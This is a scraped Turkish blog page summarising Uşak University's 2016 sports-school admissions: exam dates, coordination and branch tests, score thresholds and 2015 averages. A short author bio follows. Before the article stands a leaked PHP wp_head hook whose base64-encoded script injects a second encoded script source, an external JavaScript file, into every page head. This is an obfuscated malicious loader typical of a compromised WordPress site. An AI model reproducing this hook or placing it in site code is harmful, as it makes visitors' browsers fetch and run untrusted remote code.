function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Uşak Üniversitesi Besyo 2016 Kapsamlı Özet – Besyo Hakkında Güncel Bilgiler

Uşak Üniversitesi Besyo 2016 Kapsamlı Özet

UŞAK ÜNİVERSİTESİ

Online Başvuru 20-29 Temmuz 2016
Sınav
4-13 Ağustos

Sınav İçeriğinin Özeti
Öğretmenlik ve yöneticilik için koordinasyon sınavı, antrenörlük için branş sınavı vardır. Sınavda en iyi derece yapan %60’lık dilim değerlendirmeye alınacak, %40’lık dilim ise değerlendirmeye alınmayacaktır. YGS baraj puanı öğretmenlik ve yöneticilik için 210, antrenörlük için ise 180’dir. Milli sporcular ve spor lisesi mezunları için baraj 150’dir. YGS’de herhangi bir puan türünde bu puanları almak yeterlidir.

Sınavın Açıklaması
1-KOORDİNASYON PARKURU(Görsel Üniversite Kılavuzundan Alıntıdır.)
Koordinasyon parkuru öğretmenlik ve yöneticilik bölümleri için yapılmaktadır.
1

1.istasyon: Denge istasyonunda aday denge aletinin başlangıcında ve bitişinde belirtilmiş alanlara basarak denge aletini geçer. Bayanlar için denge aletinin önüne kasa konulacaktır.(Kontrollü ve büyük adımda geçmek avantaj sağlar.)
2.İstasyon: Futbol şut istasyonunda aday belirtilmiş çizginin gerisinden sol ve sağ ayakla birer gol atıncaya kadar devam eder. 6 adet topun bitmesi halinde sonraki istasyona geçer.
3.İstasyon: Sıçrama istasyonunda aday 5 sağ, 5 sol olmak üzere 10 sefer çift ayak sıçrar.(Vücut bankın üzerinden kalçadan bacakları döndürerek hızlı bir şekilde yapmak avantaj sağlar. Parmak ucu kullanılmalıdır.)
4.İstasyon: Hentbol atış istasyonunda aday belirtilen çizginin gerisinden kalenin sol ve sağ üst köşelerinde bulunan yere 1’er tane isabetli gol atar. İsabet olmaması durumunda kasadaki 10 adet top bitene kadar devam edilir.
5. ve 6. İstasyon: Basketbol slalom istasyonunda aday engeller arasından top sürerek geçen aday işaretli yerden baunce pas atarak çembere topu sokar. Topu sokamayan aday atışı sokana kadar tekrar atar.
7.İstasyon: Sprint istasyonunda aday spirnt atarak parkuru tamamlar.
2-BRANŞ PARKURU
Branş parkuru yalnızca antrenörlük bölümünü tercih eden adaylar için yapılır. Basketbol, Futbol, Badminton, Hentbol, Voleybol, Tenis ve Yüzme branşlarında aday teste girer.

Kontenjanlar
Antrenörlük Eğitimi Branş Kontenjanları
1
1

2015 Yılındaki Kazananların Analizi
Beden Eğitimi ve Spor Öğretmenliği Bölümü
Kazanan erkek adayların ortalama YGS puanı 265 ve OBP puanı 360’tır.
Kazanan bayan adayların ortalama YGS puanı 245 ve OBP puanı 365’tir.
Antrenörlük Eğitimi Bölümü
Kazanan erkek adayların ortalama YGS puanı 245 ve OBP puanı 350’dir.
Kazanan bayan adayların ortalama YGS puanı 235 ve OBP puanı 355’tir.
Antrenörlük Eğitimi Bölümü 2. Öğretim
Kazanan erkek adayların ortalama YGS puanı 240 ve OBP puanı 345’tir.
Kazanan bayan adayların ortalama YGS puanı 230 ve OBP puanı 360’tır.
Spor Yöneticiliği Bölümü
Kazanan erkek adayların ortalama YGS puanı 245 ve OBP puanı 355’tir.
Kazanan bayan adayların ortalama YGS puanı 240 ve OBP puanı 335’tir.
Spor Yöneticiliği Bölümü 2. Öğretim
Kazanan erkek adayların ortalama YGS puanı 240 ve OBP puanı 330’dur.
Kazanan bayan adayların ortalama YGS puanı 245 ve OBP puanı 330’dur.

Üniversiteyi Kimler Düşünebilir?
YGS ve OBP puanı orta parkuru iyi adaylar düşünebilir. YGS’si düşük olup antrenörlükte branş sınavında iyi puan alan adaylar bölümü kazanmıştır.

Ayrıntılar İçin Öğr-Yön Kılavuzunu Görüntüle

~~
Ayrıntılar İçin Ant. Kılavuzunu Görüntüle 0

http://www.instagram.com/alp.besyocuyuz

1993 yılında Bursa'da doğdum. Küçük yaşlarda spora merak salmaya başladım. Ailemin de desteğiyle çok küçük yaşlarda spora başladım. 2012 yılında Kastamonu Üniversitesi spor yöneticiliği bölümünü kazandım. Kastamonu'yu çeşitli sebeplerle bırakıp. 2015 yılında tekrar sınava girip Ankara Üniversitesi Antrenörlük bölümünü kazandım. 2017 Yılında Uludağ üniversitesine geçiş yaptım

Bir Cevap Yazın

Menü